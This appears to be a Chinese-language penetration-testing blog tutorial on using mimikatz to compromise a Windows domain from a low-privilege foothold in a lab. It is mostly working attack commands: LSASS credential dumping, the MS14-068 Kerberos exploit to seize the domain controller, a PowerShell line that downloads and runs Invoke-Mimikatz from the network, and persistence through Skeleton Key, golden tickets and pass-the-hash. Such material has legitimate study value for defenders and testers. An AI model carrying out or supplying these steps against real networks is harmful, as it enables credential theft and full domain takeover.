0x00 前言

内网渗透中的mimikatz

上篇测试了中间人攻击利用框架bettercap,这次挑选一款更具代表性的工具——mimikatz

内网渗透中的mimikatz

0x01 简介

内网渗透中的mimikatz

mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单

0x02 测试环境

内网渗透中的mimikatz

网络资源管理模式:

已有资源:

域内一台主机权限

操作系统:win7 x64

域权限:普通用户

0x03 测试目标

内网渗透中的mimikatz

1、获得域控权限 2、导出所有用户口令 3、维持域控权限

0x04 测试过程

内网渗透中的mimikatz

1、获取本机信息

mimikatz

privilege::debug

sekurlsa::logonpasswords

获取本机用户名、口令、sidLM hashNTLM hash 如图内网渗透中的mimikatz

2、攻击域控,获得权限

使用ms14-068漏洞

ms14-068.exe -u -p -s -d

生成伪造缓存test.ccache:

如图内网渗透中的mimikatz导入伪造缓存mimikatz

kerberos::ptc test.ccache

登陆:

net use \\A-635ECAEE64804.TEST.LOCAL

dir \\A-635ECAEE64804.TEST.LOCAL\c$

获得域控权限,如图内网渗透中的mimikatz

3、导出域控信息

1)直接获取内存口令 mimikatz

privilege::debug

sekurlsa::logonpasswords

2)通过内存文件获取口令 使用procdump导出lsass.dmp mimikatz

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

3)通过powershell加载mimikatz获取口令

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

4)导出所有用户口令 使用Volue Shadow Copy获得SYSTEMSAM备份(之前文章有介绍)mimikatz

lsadump::sam SYSTEM.hiv SAM.hiv

4、维持域控权限

1Skeleton Key mimikatz

privilege::debug

misc::skeleton

万能钥匙,可使用任意用户登陆域控

net use \\A-635ECAEE64804.TEST.LOCAL mimikatz /usertest

如图内网渗透中的mimikatz

2golden ticket mimikatz

lsadump::lsa /patch

获取krbtgtntlmhash,如图内网渗透中的mimikatz

生成万能票据: mimikatz

kerberos::golden /user:Administrator /domain:test.local /sid:S-1-5-21-2848411111-3820811111-1717111111 /krbtgt:d3b949b1f4ef947820f0950111111111 /ticket:test.kirbi

导入票据: mimikatz

kerberos::ptt test.kirbi

登陆域控:

net use \\A-635ECAEE64804.TEST.LOCAL

dir \\A-635ECAEE64804.TEST.LOCAL\c$

如图内网渗透中的mimikatz

Tips:

Golden Ticket不多说,自行理解

By default, the Golden Ticket default lifetime is 10 years

password changing/smartcard usage does not invalidate Golden Ticket;

this ticket is not emitted by the real KDC, it's not related to ciphering methods allowed;

NTLM hash of krbtgt account is never changed automatically.

3Pass-The-Hash mimikatz

sekurlsa::pth /user:Administrator /domain:test.local /ntlm:cc36cf7a8514893efccd332446158b1a

如图内网渗透中的mimikatz

5、补充

登陆域控,刷新扫雷记录,留下名字;D mimikatz

minesweeper::infos

如图内网渗透中的mimikatz

0x05 小结

内网渗透中的mimikatz

本文重点在于介绍mimikatz在内网渗透中的常用方法,其它细节做了适当省略,可在后续详细介绍细节。

相关文章:

  • 2021-09-27
  • 2022-01-12
  • 2021-06-15
  • 2021-08-25
  • 2022-03-07
  • 2022-12-23
  • 2022-12-23
  • 2021-11-18
猜你喜欢
  • 2022-12-23
  • 2021-11-18
  • 2022-12-23
  • 2021-05-11
  • 2021-11-06
  • 2022-01-17
  • 2021-12-15
相关资源
相似解决方案